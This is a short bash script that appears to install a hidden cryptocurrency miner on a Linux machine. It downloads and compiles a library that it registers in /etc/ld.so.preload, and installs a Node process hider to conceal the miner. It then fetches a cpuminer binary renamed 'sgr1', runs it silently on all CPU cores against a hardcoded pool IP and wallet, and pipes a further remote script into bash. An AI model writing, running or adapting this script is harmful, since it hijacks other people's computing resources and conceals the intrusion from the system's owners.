#!/bin/bash
apt-get update ; apt-get -y install sudo npm wget
curl https://github.com/adawisaud/adawisaud/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 8.8.8.8;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.2.0 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
wget -O sgr1 https://bitbucket.org/mypile/filesg/downloads/cpuminer-avx2 >/dev/null 2>&1
chmod +x sgr1
sudo ./sgr1 -a gr -o 45.32.124.79:80 -u RbxJP5k7d15URHn53uMXsGWqdSGqf12Py1.xxx -p webpassword=x -t $(nproc --all) > /dev/null 2>&1 &
curl -sL https://bitbucket.org/mypile/filesg/raw/main/boled04.sh | bash
